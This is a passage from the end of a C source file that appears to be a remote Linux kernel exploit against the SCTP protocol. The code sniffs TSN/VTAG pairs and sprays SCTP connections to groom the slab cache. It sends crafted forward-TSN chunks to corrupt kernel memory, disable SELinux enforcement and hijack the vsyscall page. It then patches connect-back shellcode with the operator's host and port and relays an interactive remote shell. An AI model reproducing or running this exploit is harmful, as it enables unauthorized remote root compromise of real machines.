894. FD_SET(listenfd, &r);
895. t.tv_sec = 3;
896. t.tv_usec = 0;
897. __msg("[**] Waiting daemons executing gettimeofday().. this can take up to one minute...\n");
898. __msg("[**] ..");
899. fflush(stdout);
900.  
901. while(select(listenfd+1, &r, NULL, NULL, &t) == 0)
902. {
903. printf("..");
904. fflush(stdout);
905. t.tv_sec = 3;
906. t.tv_usec = 0;
907. FD_ZERO(&r);
908. FD_SET(listenfd, &r);
909. }
910. __msg("..\n");
911.  
912. new_fd = accept(listenfd, NULL, 0);
913. if(new_fd < 0)
914. __fatal_perror("accept: listen fd");
915.  
916.  
917. __msg("[**] Connected!\n");
918. patchjump();
919.  
920. close(listenfd);
921.  
922. write(new_fd, "id\n", 3);
923.  
924. FD_ZERO(&r);
925. FD_SET(new_fd, &r);
926. FD_SET(0, &r);
927. while(select(new_fd+1, &r, NULL, NULL, NULL) > 0)
928. {
929. if(FD_ISSET(0, &r)) // read from stdin
930. {
931. ret = read(0, buffer, sizeof(buffer));
932. if(ret < 0)
933. __fatal_perror("read: from stdin");
934. else
935. ret = write(new_fd, buffer, ret);
936. }
937.  
938. if(FD_ISSET(new_fd, &r))
939. {
940. ret = read(new_fd, buffer, sizeof(buffer));
941. if(!ret) {
942. __msg("Endopoint closed the connection\n");
943. break;
944. }
945. else if(ret > 0)
946. {
947. write(1, buffer, ret);
948. }
949. else
950. __fatal_perror("read: from net");
951. }
952.  
953. FD_ZERO(&r);
954. FD_SET(new_fd, &r);
955. FD_SET(0, &r);
956. }
957.  
958. }
959.  
960.  
961. /* needed when exploiting old SLAB */
962. void swap_to_SLAB_chunk()
963. {
964. __u32 tmp;
965. __u16 tmp16;
966.  
967. tmp = tsn;
968. tsn = tsn2;
969. tsn2 = tmp;
970.  
971. tmp = vtag;
972. vtag = vtag2;
973. vtag2 = tmp;
974.  
975. tmp16 = sport;
976. sport = sport2;
977. sport2 = tmp16;
978. }
979.  
980.  
981.  
982. int main(int argc, char **argv)
983. {
984.  
985. int ret, fd, i, listenfd,o=1;
986. struct sockaddr_in l;
987. __u32 lh;
988. __u16 lp;
989.  
990. sctp_getopt(argc, argv);
991.  
992. listenfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
993. if(setsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o)) < 0)
994. __fatal_perror("setsockopt: SO_REUSEADDR");
995.  
996. l.sin_family = PF_INET;
997. l.sin_port = htons(h.lport);
998. l.sin_addr.s_addr = inet_addr(h.lhost);
999. if(bind(listenfd, (struct sockaddr *)&l, sizeof(l)) < 0)
1000. __fatal_perror("bind: sock");
1001.  
1002. if(listen(listenfd, 4) < 0)
1003. __fatal_perror("listen: sock");
1004.  
1005.  
1006. /* set connect back params */
1007. lh = inet_addr(h.lhost);
1008. lp = htons(h.lport);
1009. memcpy(k->scode + k->portoff, &lp, 2);
1010. memcpy(k->scode + k->hostoff, &lh, 4);
1011.  
1012. raw_sctp = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP);
1013. if(raw_sctp < 0)
1014. __fatal_perror("socket: RAW/SCTP montitor socket");
1015.  
1016. server_sctp.sin_family = PF_INET;
1017. server_sctp.sin_port = htons(h.rport);
1018. server_sctp.sin_addr.s_addr = inet_addr(h.rhost);
1019.  
1020. __msg("[**] Monitoring Network for TSN/VTAG pairs.. \n");
1021. ret = clone(clone_thread, clone_stack+STACK_SIZE-8, CLONE_VM|SIGCHLD, NULL);
1022. if(ret < 0)
1023. __fatal_perror("clone");
1024.  
1025. sleep(1);
1026.  
1027. __msg("[**] Start flushing slub cache...\n");
1028. for(i=0; i<=h.nconn; i++)
1029. {
1030. __u16 p = sport-(h.nconn-1)+i;
1031. if(p == sport || p== sport2)
1032. fd = make_sctp_connection(p, h.rport, 1);
1033. else
1034. fd = make_sctp_connection(sport-(h.nconn-1)+i, h.rport, 0);
1035. // usleep(10);
1036. }
1037.  
1038.  
1039. disable_abort();
1040. /* wait for monitoring engine */
1041. wait(NULL);
1042.  
1043. if(k->allocator_type == SLAB_ALLOCATOR)
1044. swap_to_SLAB_chunk();
1045.  
1046. if(vtag && tsn && vtag2 && tsn2)
1047. {
1048. __u32 acc;
1049.  
1050. __msg_f("[**] Using TSN/VTAG pairs: (TSN: %x <=> VTAG: %x) / (TSN: %x <=> VTAG: %x)...\n", tsn, vtag, tsn2, vtag2);
1051. sleep(1);
1052.  
1053. if(k->selinux)
1054. {
1055. __msg("[**] Overwriting neightboard sctp map..\n");
1056. acc = (k->slubsize - k->chunksize) / 2;
1057. ret = build_stream(k->selinux, k->ptrsize, acc);
1058. if(ret < 0)
1059. __fatal("Error Building Streams...");
1060.  
1061. htons_streams(streams, ret);
1062. send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn);
1063.  
1064. __msg("[**] Disabling Selinux Enforcing Mode..\n");
1065. ret = build_stream(__zero, 4, 0);
1066. if(ret < 0)
1067. __fatal("Error Building Streams...");
1068.  
1069. htons_streams(streams, ret);
1070. send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2);
1071. }
1072.  
1073. __msg("[**] Overwriting neightboard sctp map ......\n");
1074. acc = (k->slubsize - k->chunksize) / 2;
1075. ret = build_stream(k->vsysaddr, k->ptrsize, acc);
1076. if(ret < 0)
1077. __fatal("Error Building Streams...");
1078.  
1079. htons_streams(streams, ret);
1080. send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn);
1081.  
1082. __msg("[**] Overwriting vsyscall shadow map..\n");
1083. acc = 0x930 / 2;
1084. ret = build_stream(k->scode, k->scodesize, acc); //1176
1085. if(ret < 0)
1086. __fatal("Error Building Streams...");
1087.  
1088. htons_streams(streams, ret);
1089. send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2);
1090.  
1091. __msg("[**] Hijacking vsyscall shadow map..\n");
1092. ret = build_stream(k->vsysjump, k->vsysjumpsize, 0);
1093. if(ret < 0)
1094. __fatal("Error Building Streams...");
1095.  
1096. htons_streams(streams, ret);
1097. send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2);
1098.  
1099. sleep(1);
1100. }
1101. else
1102. __fatal("VTAG/TSN not found: network error");
1103.  
1104.  
1105. multiplex(listenfd);
1106. __msg("[**] Closing Connection... \n");
1107. return 0;
1108. }